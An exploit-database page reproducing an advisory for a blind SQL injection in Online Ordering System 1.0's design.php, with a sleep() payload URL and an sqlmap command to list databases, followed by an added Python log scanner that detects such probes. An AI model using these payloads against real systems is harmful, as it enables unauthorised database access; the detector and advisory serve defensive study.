| CVE | Category | Price | Severity |
|---|---|---|---|
| N/A | CWE-89 | Unavailable | High |

| Author | Risk | Exploitation Type | Date |
|---|---|---|---|
| Unknown | High | Remote | 2021-03-11 |
```text
# Exploit Title: Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)
# Date: 2021-03-04
# Exploit Author: Suraj Bhosale
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html
# Version: v1.0
# Vulnerable endpoint: http://localhost/onlineordering/GPST/admin/design.php?id=9
# Vulnerable Parameter: id

*Steps to Reproduce:*

1) Visit http://localhost/onlineordering/GPST/admin/design.php?id=12'%20and%20sleep(20)%20and%20'1'='1 and you will see a time delay of 20 seconds in the response.

2) Now fire up the following command in sqlmap.

CMD: sqlmap -u http://localhost/onlineordering/GPST/admin/design.php?id=9 --batch --dbs

3) Using the above command we will get the names of all the databases.
```
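The advisory describes a time-based blind injection: the `id` parameter of `design.php` is meant to be an integer, yet a quoted `sleep()` expression changes the response time, which is how both the manual check and sqlmap confirm the flaw (the fix on the application side is a prepared statement with `id` cast to an integer). From the defender's side, the same signal shows up in web server logs. The following Python scanner is an added example, not part of the advisory or of the vendor's code: it parses access log lines, percent-decodes each query parameter, and flags requests where a numeric parameter carries SQL syntax or a timing function, correlating that with the measured response time. The log lines are constructed for the example; the field layout (combined log format with the request duration in seconds as a trailing field, as nginx's `$request_time` gives) and the 3-second threshold are assumptions to adjust for a real deployment.

```python
"""
Added example (not from the advisory or the vendor's code): flag time-based
blind SQL injection probes against a numeric parameter, as in
design.php?id=..., by reading web server access logs.

Assumptions: combined log format with the request duration in seconds
appended as the last field (nginx $request_time), and that `id` is only
ever a plain integer in legitimate traffic.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import parse_qsl, urlsplit

# Constructed sample traffic (not captured from a real server). Lines 2 and 4
# carry the advisory's payload (the fourth one percent-encoded and upper-cased);
# line 3 is the same kind of probe rejected quickly with a 403.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Mar/2021:10:01:02 +0000] "GET /onlineordering/GPST/admin/design.php?id=9 HTTP/1.1" 200 4120 "-" "Mozilla/5.0" 0.041
10.0.0.5 - - [11/Mar/2021:10:01:09 +0000] "GET /onlineordering/GPST/admin/design.php?id=12'%20and%20sleep(20)%20and%20'1'='1 HTTP/1.1" 200 4120 "-" "Mozilla/5.0" 20.057
10.0.0.7 - - [11/Mar/2021:10:02:15 +0000] "GET /onlineordering/GPST/admin/design.php?id=1%20and%20sleep(20) HTTP/1.1" 403 199 "-" "sqlmap/1.5" 0.009
10.0.0.7 - - [11/Mar/2021:10:02:31 +0000] "GET /onlineordering/GPST/admin/design.php?id=9%27%20AND%20SLEEP%285%29%20AND%20%271%27%3D%271 HTTP/1.1" 200 4120 "-" "sqlmap/1.5" 5.032
10.0.0.9 - - [11/Mar/2021:10:03:00 +0000] "GET /onlineordering/GPST/index.php HTTP/1.1" 200 812 "-" "Mozilla/5.0" 0.012
"""

# Combined log format plus a trailing request-time field (assumed layout).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)" (?P<rt>[\d.]+)$'
)
# SQL functions whose only purpose inside a request parameter is to delay the
# response; their presence is a strong indicator of a blind-SQLi probe.
TIMING_RE = re.compile(r'\b(sleep|benchmark|pg_sleep|waitfor)\b', re.IGNORECASE)
NUMERIC_PARAMS = {'id'}   # parameters the application should only receive as integers
SLOW_THRESHOLD = 3.0      # seconds; tune to the site's normal tail latency


@dataclass
class Finding:
    ip: str
    path: str
    status: int
    param: str
    value: str
    reasons: list = field(default_factory=list)


def analyze_line(line: str):
    """Return a Finding for a suspicious request, or None for a clean/unparsable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group('target'))
    rt = float(m.group('rt'))
    # parse_qsl percent-decodes values, so encoded payloads are inspected as SQL text.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        reasons = []
        if name in NUMERIC_PARAMS and not value.isdigit():
            reasons.append('non-numeric value in numeric parameter')
        if TIMING_RE.search(value):
            reasons.append('timing function in parameter')
            # A long response together with a timing function means the payload
            # reached the database; a fast 403 means something blocked it.
            if rt >= SLOW_THRESHOLD:
                reasons.append(f'slow response ({rt:.1f}s) consistent with injected delay')
        if reasons:
            return Finding(m.group('ip'), url.path, int(m.group('status')), name, value, reasons)
    return None


def scan(log_text: str):
    """Run analyze_line over every line of a log and collect the findings."""
    return [f for f in map(analyze_line, log_text.splitlines()) if f is not None]


if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f'{f.ip} {f.status} {f.path}?{f.param}={f.value!r}: ' + '; '.join(f.reasons))
```

Run over the sample, the scanner reports the three probe lines and ignores the two legitimate requests; the distinction between a slow 200 and a fast 403 tells an analyst whether the injected delay actually executed, which is the point of looking at request time rather than only at the URL.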
Copyright ©2024 Exploitalert.